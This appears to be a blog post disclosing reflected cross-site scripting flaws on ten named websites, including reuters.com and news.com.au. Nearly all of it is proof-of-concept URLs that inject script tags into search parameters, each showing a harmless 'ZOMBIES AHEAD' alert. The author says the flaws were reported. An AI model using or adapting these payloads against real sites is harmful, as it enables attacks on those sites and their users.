Pack of xss

|
I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately even though XSS is old news in the security community and there are well established techniques to mitigate the attack it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au

All xss vectors displayed here was reported last weekend and some may have been fixed.

Businessday.com.au;

http://www.businessday.com.au/execute_search.html?text='><script>alert('zombies ahead!');</script><&ss=Business

Carsguide.com.au;
carsguide.com.au-xss.png
http://www.carsguide.com.au/search/?type=all&Ntt=<script>alert('ZOMBIES AHEAD');</script><

Conceptart.org;
conceptart.png
http://www.conceptart.org/index.php?artist=%22%3E%3C/a%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD%27%29;%3C/script%3E%3C

Investsmart.com.au;
investsmart.com.au-xss.png
http://www.investsmart.com.au/search/?MainSearch=%22%3E%3Cscript%3Ealert(%22ZOMBIES+AHEAD!%22)%3B%3C%2Fscript%3E%3C

Mycareer.com.au;
mycareer-xss.png
http://mycareer.com.au/jobseeker/search/results.aspx?s=155&sq=%3C%2ftitle%3E%3Cscript%3Ealert(%27ZOMBIES+AHEAD!%27)%3b%3C%2fscript%3E%3C

News.com.au;
news.com.au-xss.png
http://search.news.com.au/search?q=abc%3C%2Ftitle%3E%3Cscript%3Ealert%28String.fromCharCode%2890,79,77,66,73,69,83,32,65,72,69,65,68,33%29%29;%3C/script%3E%3C&sid=&us=&as=&ac=&r=typed

Reuters.com;
reuters.com-xss.png
http://www.reuters.com/search?blob=%22%3E%3Cscript%3Ealert(%27ZOMBIES%20AHEAD!%27);%3C/script%3E%3C

Stayz.com.au;
stays-xss.png
http://www.stayz.com.au/search.action
POSTDATA: locId=0&locLevel=&location=%22%3E%3Cscript%3Ealert%28%27ZOMBIES+AHEAD%21%27%29%3B%3C%2Fscript%3E%3C&checkin=&numNights=1&minPrice=0&maxPrice=0&numGuests=1&rating=0

Three.com.au;
shop.three.com.au.png
http://shop.three.com.au/search/searchResult.jsp?query=%22;%3C/script%3E%3Cscript%3Ealert%28%27ZOMBIES%20AHEAD!%27%29;%3C/script%3E%3C&_requestid=542403

Thebigchair.com.au;
thebigchair.com.au-xss.png
http://thebigchair.com.au/consumer/search/results.aspx?q=%3cscript%3ealert(%27zombies+ahead!%27)%3b%3c%2fscript%3e









No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.